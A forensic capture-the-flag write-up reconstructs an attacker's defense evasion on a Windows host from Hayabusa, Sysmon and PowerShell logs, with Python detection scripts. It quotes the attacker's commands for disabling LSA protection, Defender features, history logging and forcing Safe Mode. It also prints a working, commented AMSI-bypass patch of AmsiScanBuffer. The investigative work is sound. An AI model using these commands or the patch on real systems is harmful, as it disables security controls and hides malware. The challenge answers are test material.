operation blackout 2025: smoke & mirrors

Released: 2025-06-06
Retired: 2025-06-06
Author: iamr007

Scenario

Byte Doctor Reyes is investigating a stealthy post-breach attack where several expected security logs and Windows Defender alerts appear to be missing. He suspects the attacker employed defense evasion techniques to disable or manipulate security controls, significantly complicating detection efforts. Using the exported event logs, your objective is to uncover how the attacker compromised the system’s defenses to remain undetected.


Task 01

Question: The attacker disabled LSA protection on the compromised host by modifying a registry key. What is the full path of that registry key?

Three .evtx files are available for analysis in this case: the two PowerShell logs (the classic Microsoft-Windows-PowerShell log and its Operational channel, which carries the script block events) and a Sysmon Operational log collected with an unknown configuration.

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
------         4/10/2025   8:43 AM        2166784 Microsoft-Windows-Powershell-Operational.evtx
------         4/10/2025   8:42 AM        1118208 Microsoft-Windows-Powershell.evtx
------         4/10/2025   8:44 AM        2166784 Microsoft-Windows-Sysmon-Operational.evtx

To gain an overview, Hayabusa can pre-filter and highlight the relevant events. Running hayabusa.exe json-timeline -U -d . -o hayabusa.json in the evidence directory (-U switches the timestamps to UTC) produces a JSON timeline from which the answers below are taken.

LSA protection guards against credential dumping by running the LSASS process as a Protected Process Light (PPL), a feature available since Windows 8.1 and Server 2012 R2: non-protected processes can no longer open LSASS for memory reads or inject code into it. The setting is controlled by the REG_DWORD value RunAsPPL under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa; setting it to 0 (or deleting it) turns the protection off after the next reboot, unless the setting was additionally locked with a UEFI variable, in which case the registry change alone is not enough. Hayabusa does the heavy lifting here: the dedicated rule LSA PPL Protection Disabled Via Reg.EXE fired in this case and points straight at the Sysmon process-creation event, with timestamp and full command line. One detail in that event is worth a second look: the command line names C:\WINDOWS\system32\reg.exe, but the image that actually ran is C:\Windows\SysWOW64\reg.exe, so reg.exe was launched from a 32-bit parent process and WoW64 file-system redirection substituted the 32-bit binary.

{
    "Timestamp": "2025-04-10 06:28:47.474 +00:00",
    "RuleTitle": "LSA PPL Protection Disabled Via Reg.EXE",
    "Level": "high",
    "Computer": "DESKTOP-M3AKJSD",
    "Channel": "Sysmon",
    "EventID": 1,
    "RecordID": 7807,
    "Details": {
        "Cmdline": "\"C:\\WINDOWS\\system32\\reg.exe\" add HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA /v RunAsPPL /t REG_DWORD /d 0 /f\"",
        "Proc": "C:\\Windows\\SysWOW64\\reg.exe",
[...]

Answer: HKLM\SYSTEM\CurrentControlSet\Control\LSA


Task 02

Question: Which PowerShell command did the attacker first execute to disable Windows Defender?

There are many ways to disable or weaken Windows Defender, and the attacker used several of them here. Thanks to PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) and the detailed Sysmon configuration, multiple Hayabusa rules fired for manipulation of Defender's capabilities. Sorting those hits by timestamp, the earliest is at 2025-04-10 06:31:32.867, a Set-MpPreference call recorded as a script block. The three switches turn off IOAV scanning of downloaded files and attachments, e-mail scanning and Block at First Sight; they leave real-time monitoring on, and on a host with Tamper Protection enabled the cmdlet would be rejected.

{
    "Timestamp": "2025-04-10 06:31:32.867 +00:00",
    "RuleTitle": "Tamper Windows Defender - ScriptBlockLogging",
    "Level": "high",
    "Computer": "DESKTOP-M3AKJSD",
    "Channel": "PwSh",
    "EventID": 4104,
    "RecordID": 3466,
    "Details": {
        "ScriptBlock": "Set-MpPreference -DisableIOAVProtection $true -DisableEmailScanning $true -DisableBlockAtFirstSeen $true"
    },
    "ExtraFieldInfo": {
        "MessageNumber": 1,
        "MessageTotal": 1,
        "Path": "",
        "ScriptBlockId": "db55fc25-b6e7-4c04-bf27-37c1c540870a"
    },
    "RuleID": "6074ad34-a80f-fdd9-5c49-e1a2fc4572c4"
}

Answer: Set-MpPreference -DisableIOAVProtection $true -DisableEmailScanning $true -DisableBlockAtFirstSeen $true
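As an added example (not part of the original writeup and not Hayabusa code), the following Python script performs the Task 01 and Task 02 triage over a Hayabusa JSON timeline: it parses the reg.exe add command line into key, value name, type and data and checks whether it turns RunAsPPL off, flags the System32/SysWOW64 mismatch between command line and image, and picks the earliest Defender-related rule hit together with the Set-MpPreference switches it flips. The embedded timeline is constructed from the events quoted above plus one invented later Add-MpPreference event; that event's rule title, and the loader's tolerance for JSONL, a JSON array or concatenated pretty-printed objects, are assumptions, since the page does not state Hayabusa's exact output layout.

```python
"""Triage a Hayabusa JSON timeline for the Task 01 / Task 02 defense-evasion steps."""
import json
import re
from datetime import datetime

# Constructed input in the shape of hayabusa json-timeline output. The first two
# objects carry the values quoted in the writeup; the third is an invented later
# Defender event (assumed rule title) so that "earliest" has something to beat.
SAMPLE_TIMELINE = r'''
{"Timestamp": "2025-04-10 06:31:32.867 +00:00", "RuleTitle": "Tamper Windows Defender - ScriptBlockLogging",
 "Level": "high", "Channel": "PwSh", "EventID": 4104,
 "Details": {"ScriptBlock": "Set-MpPreference -DisableIOAVProtection $true -DisableEmailScanning $true -DisableBlockAtFirstSeen $true"}}
{"Timestamp": "2025-04-10 06:28:47.474 +00:00", "RuleTitle": "LSA PPL Protection Disabled Via Reg.EXE",
 "Level": "high", "Channel": "Sysmon", "EventID": 1,
 "Details": {"Cmdline": "\"C:\\WINDOWS\\system32\\reg.exe\" add HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA /v RunAsPPL /t REG_DWORD /d 0 /f\"",
             "Proc": "C:\\Windows\\SysWOW64\\reg.exe"}}
{"Timestamp": "2025-04-10 06:40:01.000 +00:00", "RuleTitle": "Windows Defender Exclusions Added - PowerShell",
 "Level": "med", "Channel": "PwSh", "EventID": 4104,
 "Details": {"ScriptBlock": "Add-MpPreference -ExclusionPath C:\\Users\\Public"}}
'''


def load_timeline(text):
    """Yield event dicts whether the file is JSONL, a JSON array or pretty-printed objects back to back."""
    dec, pos = json.JSONDecoder(), 0
    while True:
        while pos < len(text) and text[pos].isspace():
            pos += 1
        if pos >= len(text):
            return
        obj, pos = dec.raw_decode(text, pos)
        yield from (obj if isinstance(obj, list) else [obj])


def parse_ts(ts):
    # Hayabusa prints "YYYY-MM-DD HH:MM:SS.fff +00:00" when run with -U
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f %z")


def tokenize(cmdline):
    """Split a Windows command line on whitespace, honouring double-quoted arguments;
    the stray trailing quote seen in the Sysmon Cmdline field is dropped along the way."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_reg_add(cmdline):
    """Turn `reg.exe add <key> /v <name> /t <type> /d <data> [/f]` into a dict, or None."""
    toks = tokenize(cmdline)
    if len(toks) < 3 or not toks[0].lower().endswith("reg.exe") or toks[1].lower() != "add":
        return None
    parsed = {"key": toks[2], "value": None, "type": None, "data": None, "force": False}
    switches = {"/v": "value", "/t": "type", "/d": "data"}
    i = 3
    while i < len(toks):
        sw = toks[i].lower()
        if sw == "/f":
            parsed["force"] = True
        elif sw in switches and i + 1 < len(toks):
            i += 1
            parsed[switches[sw]] = toks[i]
        i += 1
    return parsed


def disables_lsa_ppl(parsed):
    """True when the reg add turns RunAsPPL off under the Lsa key (HKLM or its long form)."""
    if parsed is None:
        return False
    key = parsed["key"].lower().replace("hkey_local_machine", "hklm")
    return (key == r"hklm\system\currentcontrolset\control\lsa"
            and (parsed["value"] or "").lower() == "runasppl"
            and parsed["data"] in ("0", "0x0"))


def wow64_redirected(details):
    """Command line names System32 but the image that ran lives in SysWOW64: a 32-bit parent."""
    return ("\\syswow64\\" in details.get("Proc", "").lower()
            and "\\system32\\" in details.get("Cmdline", "").lower())


def mp_preference_switches(script):
    """Disable* switches set to $true in a Set-/Add-MpPreference script block."""
    if not re.match(r"\s*(Set|Add)-MpPreference\b", script, re.I):
        return []
    return re.findall(r"-(Disable\w+)\s+\$true", script, re.I)


def triage(text):
    events = sorted(load_timeline(text), key=lambda e: parse_ts(e["Timestamp"]))
    lsa_hits = [e for e in events if e.get("RuleTitle", "").startswith("LSA PPL Protection Disabled")]
    defender = [e for e in events if "defender" in e.get("RuleTitle", "").lower()]
    first = defender[0] if defender else None
    lsa = parse_reg_add(lsa_hits[0]["Details"]["Cmdline"]) if lsa_hits else None
    return {
        "lsa": lsa,
        "lsa_disabled": disables_lsa_ppl(lsa),
        "lsa_wow64": wow64_redirected(lsa_hits[0]["Details"]) if lsa_hits else False,
        "first_defender_tamper": first,
        "defender_switches": mp_preference_switches(first["Details"]["ScriptBlock"]) if first else [],
    }


if __name__ == "__main__":
    for k, v in triage(SAMPLE_TIMELINE).items():
        print(f"{k}: {v}")
```

Point load_timeline at the real hayabusa.json and the same triage() call returns the registry key for Task 01 and the earliest Defender tampering for Task 02; the reg add parser is deliberately tolerant of the trailing quote that Sysmon recorded in the command line.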


Task 03

Question: The attacker loaded an AMSI patch written in PowerShell. Which function in the DLL is being patched by the script to effectively disable AMSI?

By reviewing the entries flagged by Hayabusa under the Potentially Malicious PwSh rule, a script with the relevant functionality was identified. It contains a function named Disable-Protection which, upon successful execution, outputs Protection Disabled. The C# embedded in the script performs the following actions:

  • Obtains a handle to amsi.dll, the Antimalware Scan Interface library that PowerShell loads to hand script content to the registered antimalware provider (Windows Defender on this host)
  • Resolves the address of the AmsiScanBuffer export with GetProcAddress; both strings are assembled character by character so that neither amsi.dll nor AmsiScanBuffer appears literally in the script block
  • Switches the protection of the first bytes of the function to PAGE_EXECUTE_READWRITE (0x40) with VirtualProtect
  • Overwrites the function entry with 0x31 0xC0 0xC3, which decodes to xor eax, eax; ret rather than a bare RET: every call now returns HRESULT 0 (S_OK) immediately, the AMSI_RESULT output is never written, so nothing is ever reported as detected. The original page protection is restored afterwards.

using System;
using System.Runtime.InteropServices;

public class P {
    // Win32 imports used to locate the export and patch it in place
    [DllImport("kernel32.dll")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32.dll")] public static extern IntPtr GetModuleHandle(string lpModuleName);
    [DllImport("kernel32.dll")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

    public static bool Patch() {
        // Strings are built character by character to evade keyword matching on the script block
        IntPtr h = GetModuleHandle("a" + "m" + "s" + "i" + ".dll");                 // amsi.dll, already loaded in the PowerShell process
        if (h == IntPtr.Zero) return false;
        IntPtr a = GetProcAddress(h, "A" + "m" + "s" + "i" + "S" + "c" + "a" + "n" + "B" + "u" + "f" + "f" + "e" + "r");   // AmsiScanBuffer
        if (a == IntPtr.Zero) return false;
        UInt32 oldProtect;
        if (!VirtualProtect(a, (UIntPtr)5, 0x40, out oldProtect)) return false;     // 0x40 = PAGE_EXECUTE_READWRITE
        byte[] patch = { 0x31, 0xC0, 0xC3 };                                        // xor eax, eax ; ret  -> returns S_OK without scanning
        Marshal.Copy(patch, 0, a, patch.Length);
        return VirtualProtect(a, (UIntPtr)5, oldProtect, out oldProtect);           // restore the original page protection
    }
}

Answer: AmsiScanBuffer
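The string-concatenation trick above is exactly what defeats naive keyword matching on script blocks. As an added example (not part of the original writeup), the following Python script folds such concatenated literals back together before looking for AMSI indicators, pulls out embedded byte arrays and labels the known AmsiScanBuffer entry patches. The C# sample is the script quoted above; the benign block and the second known patch signature (mov eax, 0x80070057; ret, the E_INVALIDARG variant) are constructed additions, and the indicator list is this example's own choice rather than anything Hayabusa ships.

```python
"""Flag AMSI-patching script blocks after undoing literal-concatenation obfuscation."""
import re

# The C# body from the script block discussed above, as it appears in a 4104 event.
SAMPLE_CSHARP = '''
public class P { [DllImport("kernel32.dll")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32.dll")] public static extern IntPtr GetModuleHandle(string lpModuleName);
    [DllImport("kernel32.dll")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
    public static bool Patch() {
        IntPtr h = GetModuleHandle("a" + "m" + "s" + "i" + ".dll");
        IntPtr a = GetProcAddress(h, "A" + "m" + "s" + "i" + "S" + "c" + "a" + "n" + "B" + "u" + "f" + "f" + "e" + "r");
        UInt32 oldProtect;
        if (!VirtualProtect(a, (UIntPtr)5, 0x40, out oldProtect)) return false;
        byte[] patch = { 0x31, 0xC0, 0xC3 };
        Marshal.Copy(patch, 0, a, patch.Length);
        return VirtualProtect(a, (UIntPtr)5, oldProtect, out oldProtect);
    }
}
'''
# Constructed benign block for the negative case.
SAMPLE_BENIGN = 'Get-ChildItem "C:\\Temp" | Where-Object { $_.Length -gt 0x10 } | Select-Object Name, Length'

STR_LIT = r'"(?:[^"\\]|\\.)*"|\'(?:[^\'\\]|\\.)*\''
CONCAT = re.compile(rf"(?:{STR_LIT})(?:\s*\+\s*(?:{STR_LIT}))+")

# Indicators that only show up after folding: amsi.dll exports and PowerShell's internal flag
AMSI_INDICATORS = ("AmsiScanBuffer", "AmsiScanString", "AmsiOpenSession", "AmsiInitialize", "amsiInitFailed")

# Entry-point overwrites seen in public bypasses (x86/x64 machine code, little-endian immediates)
KNOWN_PATCHES = [
    ((0x31, 0xC0, 0xC3), "xor eax, eax ; ret -> returns S_OK, scan result never written"),
    ((0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3), "mov eax, 0x80070057 ; ret -> returns E_INVALIDARG, scan skipped"),
]
BYTE_SEQ = re.compile(r"0x[0-9A-Fa-f]{1,2}(?:\s*,\s*0x[0-9A-Fa-f]{1,2})+")


def fold_string_concats(text):
    """Rewrite "a" + "m" + "s" + "i" into "amsi" so that plain substring checks see the real name."""
    def join(m):
        parts = re.findall(STR_LIT, m.group(0))
        return '"' + "".join(p[1:-1] for p in parts) + '"'
    return CONCAT.sub(join, text)


def extract_byte_sequences(text):
    """Every comma-separated run of hex bytes, e.g. `{ 0x31, 0xC0, 0xC3 }` or a PowerShell [byte[]] list."""
    return [tuple(int(b, 16) for b in re.findall(r"0x[0-9A-Fa-f]{1,2}", m.group(0)))
            for m in BYTE_SEQ.finditer(text)]


def identify_patch(seq):
    """Name of the known patch the byte run starts with, or None."""
    for prefix, meaning in KNOWN_PATCHES:
        if seq[:len(prefix)] == prefix:
            return meaning
    return None


def analyze_script_block(script):
    folded = fold_string_concats(script)
    targets = [name for name in AMSI_INDICATORS if name in folded]
    patches = [(seq, identify_patch(seq)) for seq in extract_byte_sequences(folded)]
    writes_memory = bool(re.search(r"VirtualProtect|Marshal\.(Copy|WriteByte|WriteInt32)", folded))
    # "amsi" only becomes visible after folding: the author hid the name on purpose
    obfuscated = "amsi" in folded.lower() and "amsi" not in script.lower()
    if targets and (writes_memory or any(m for _, m in patches)):
        verdict = "amsi_patch"
    elif targets:
        verdict = "amsi_reference"
    else:
        verdict = "clean"
    return {"targets": targets, "patches": patches, "writes_memory": writes_memory,
            "obfuscated": obfuscated, "verdict": verdict}


if __name__ == "__main__":
    for label, block in (("csharp", SAMPLE_CSHARP), ("benign", SAMPLE_BENIGN)):
        print(label, analyze_script_block(block))
```

Run analyze_script_block() over the ScriptBlock field of each 4104 event; the obfuscated flag alone is a useful hunting signal, since legitimate scripts have no reason to spell amsi one character at a time.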


Task 04

Question: Which command did the attacker use to restart the machine in Safe Mode?

To check for further executed commands, the Event ID 4104 script blocks can be reviewed again. Among them is a call to bcdedit, the tool that edits the Boot Configuration Data store. Its built-in help shows that the safeboot element of the OS loader entry controls Safe Mode: bcdedit /set safeboot network makes every subsequent boot start in Safe Mode with Networking until the element is removed again with bcdedit /deletevalue safeboot. The motive is defense evasion: in Safe Mode the Windows Defender service and many endpoint security agents are not started, while the Networking variant keeps the attacker's remote access alive.

bcdedit /? TYPES OSLOADER

WINDOWS OS LOADER

The following types can be used only for Windows OS Loader entries. For
information about data formats for these types, run "bcdedit /? FORMATS".

Boot
====
    BOOTLOG (bool)          Enables the system initialization log.
    BOOTSTATUSPOLICY        Can be DisplayAllFailures, IgnoreAllFailures,
                            IgnoreShutdownFailures, IgnoreBootFailures,
                            IgnoreCheckpointFailures, DisplayShutdownFailures,
                            DisplayBootFailures, or DisplayCheckpointFailures.
    LASTKNOWNGOOD (bool)    Enables boot to last known good configuration.
    NOCRASHAUTOREBOOT (bool)    Disables automatic restart on crash.
    RESUMEOBJECT (id)       Defines the identifier of the resume object that
                            is associated with this operating system object.
    SAFEBOOT                Can be Minimal, Network or DsRepair
    SAFEBOOTALTERNATESHELL (bool)   Uses the alternate shell when booted into
                                    Safe mode.
    SOS (bool)              Displays additional boot information.
    WINPE (bool)            Enables the computer to boot to Windows PE.

This exact command can be extracted from the PowerShell logs. Thanks to PowerShell Script Block Logging, the following line appears in the logs:

{
    "Timestamp": "2025-04-10 06:38:35.402 +00:00",
    "RuleTitle": "PwSh Scriptblock",
    "Level": "info",
    "Computer": "DESKTOP-M3AKJSD",
    "Channel": "PwSh",
    "EventID": 4104,
    "RecordID": 3787,
    "Details": {
        "ScriptBlock": "bcdedit /set safeboot network"
    },
    "ExtraFieldInfo": {
        "MessageNumber": 1,
        "MessageTotal": 1,
        "Path": "",
        "ScriptBlockId": "4424e2da-5302-4ba7-9280-a7b70b33e0aa"
    },
    "RuleID": "0f3b1343-65a5-4879-b512-9d61b0e4e3ba"
}

The challenge expects the executable name with its extension, so the Sysmon Event ID 1 process-creation event, recorded 38 ms after the script block, supplies the answer in the required form:

{
    "Timestamp": "2025-04-10 06:38:35.440 +00:00",
    "RuleTitle": "Proc Exec",
    "Level": "info",
    "Computer": "DESKTOP-M3AKJSD",
    "Channel": "Sysmon",
    "EventID": 1,
    "RecordID": 7899,
    "Details": {
        "Cmdline": "\"C:\\WINDOWS\\system32\\bcdedit.exe\" /set safeboot network\"",
        "Proc": "C:\\Windows\\System32\\bcdedit.exe",
[...]

Answer: bcdedit.exe /set safeboot network
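The 38 ms gap between the script block and the Sysmon process creation is the join key between the two log sources: 4104 records what was typed, Sysmon records what actually ran. As an added example (not part of the original writeup), the following Python script pairs each 4104 script block with the closest Sysmon Event ID 1 whose image basename and arguments match, and returns the command in the form the challenge wants. The event list is constructed from the bcdedit pair and the Set-PSReadlineOption block quoted in this writeup plus one invented conhost.exe process creation as noise; the five-second window and the rule that Verb-Noun cmdlets never spawn a process are this example's own assumptions.

```python
"""Pair PowerShell script blocks (Event ID 4104) with the Sysmon process creations (Event ID 1)
they spawned, to recover the executable name the challenge asks for."""
import re
from datetime import datetime, timedelta

# Constructed timeline in the shape of the Hayabusa output: the bcdedit pair and the
# Set-PSReadlineOption block are the events quoted in this writeup; the conhost.exe
# process creation is invented noise inside the time window.
EVENTS = [
    {"Timestamp": "2025-04-10 06:38:35.402 +00:00", "Channel": "PwSh", "EventID": 4104,
     "Details": {"ScriptBlock": "bcdedit /set safeboot network"}},
    {"Timestamp": "2025-04-10 06:38:35.440 +00:00", "Channel": "Sysmon", "EventID": 1,
     "Details": {"Cmdline": "\"C:\\WINDOWS\\system32\\bcdedit.exe\" /set safeboot network\"",
                 "Proc": "C:\\Windows\\System32\\bcdedit.exe"}},
    {"Timestamp": "2025-04-10 06:38:36.100 +00:00", "Channel": "Sysmon", "EventID": 1,
     "Details": {"Cmdline": "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1",
                 "Proc": "C:\\Windows\\System32\\conhost.exe"}},
    {"Timestamp": "2025-04-10 06:38:43.549 +00:00", "Channel": "PwSh", "EventID": 4104,
     "Details": {"ScriptBlock": "Set-PSReadlineOption -HistorySaveStyle SaveNothing"}},
]


def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f %z")


def tokenize(cmdline):
    """Whitespace split that keeps double-quoted arguments together and drops stray quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def external_command(script):
    """(name, args) when the block starts with something that runs as a separate process.
    Verb-Noun cmdlets execute inside powershell.exe and never produce a Sysmon EID 1."""
    toks = tokenize(script)
    if not toks or re.fullmatch(r"[A-Za-z]+-[A-Za-z]+", toks[0]):
        return None
    return toks[0].lower(), [t.lower() for t in toks[1:]]


def match_process(script_event, events, window=timedelta(seconds=5)):
    """Closest Sysmon EID 1 after the script block whose image basename and arguments match."""
    cmd = external_command(script_event["Details"]["ScriptBlock"])
    if cmd is None:
        return None
    name, args = cmd
    t0 = parse_ts(script_event["Timestamp"])
    best = None
    for ev in events:
        if ev.get("Channel") != "Sysmon" or ev.get("EventID") != 1:
            continue
        delta = parse_ts(ev["Timestamp"]) - t0
        if delta < timedelta(0) or delta > window:
            continue
        toks = tokenize(ev["Details"]["Cmdline"])
        image = toks[0].rsplit("\\", 1)[-1].lower()          # basename of the launched image
        if image in (name, name + ".exe") and [t.lower() for t in toks[1:]] == args:
            if best is None or delta < best["delta"]:
                best = {"image": image, "args": toks[1:], "delta": delta, "proc": ev["Details"]["Proc"]}
    return best


def correlate(events):
    """One row per script block: the command as Sysmon saw it, or None for in-process cmdlets."""
    rows = []
    for ev in events:
        if ev.get("Channel") != "PwSh" or ev.get("EventID") != 4104:
            continue
        hit = match_process(ev, events)
        rows.append({
            "script": ev["Details"]["ScriptBlock"],
            "process": None if hit is None else hit["image"] + " " + " ".join(hit["args"]),
            "delta_ms": None if hit is None else int(hit["delta"] / timedelta(milliseconds=1)),
        })
    return rows


if __name__ == "__main__":
    for row in correlate(EVENTS):
        print(row)
```

A script block with no matching process creation inside the window is itself interesting: either it was a cmdlet, or Sysmon did not see the process, which is worth a look given that this attacker was busy switching logging off.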


Task 05

Question: Which PowerShell command did the attacker use to disable PowerShell command history logging?

Hayabusa's default rule set covers this step as well: the rule Clear PowerShell History - PowerShell fires on another Event ID 4104 entry at 2025-04-10 06:38:43. Set-PSReadlineOption -HistorySaveStyle SaveNothing stops PSReadLine from appending commands to its ConsoleHost_history.txt file (under %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine) for the current session. It does nothing against Script Block Logging, which is why the command itself is still visible here: the attacker removed the on-disk history but not the event-log trail.

{
    "Timestamp": "2025-04-10 06:38:43.549 +00:00",
    "RuleTitle": "Clear PowerShell History - PowerShell",
    "Level": "med",
    "Computer": "DESKTOP-M3AKJSD",
    "Channel": "PwSh",
    "EventID": 4104,
    "RecordID": 3802,
    "Details": {
        "ScriptBlock": "Set-PSReadlineOption -HistorySaveStyle SaveNothing"
    },
    "ExtraFieldInfo": {
        "MessageNumber": 1,
        "MessageTotal": 1,
        "Path": "",
        "ScriptBlockId": "eef9a7e3-fc56-47f7-b44f-2b4e1681d0bc"
    },
    "RuleID": "36e3fc18-c21d-b046-86b0-9f14ccbb975e"
}

Answer: Set-PSReadlineOption -HistorySaveStyle SaveNothing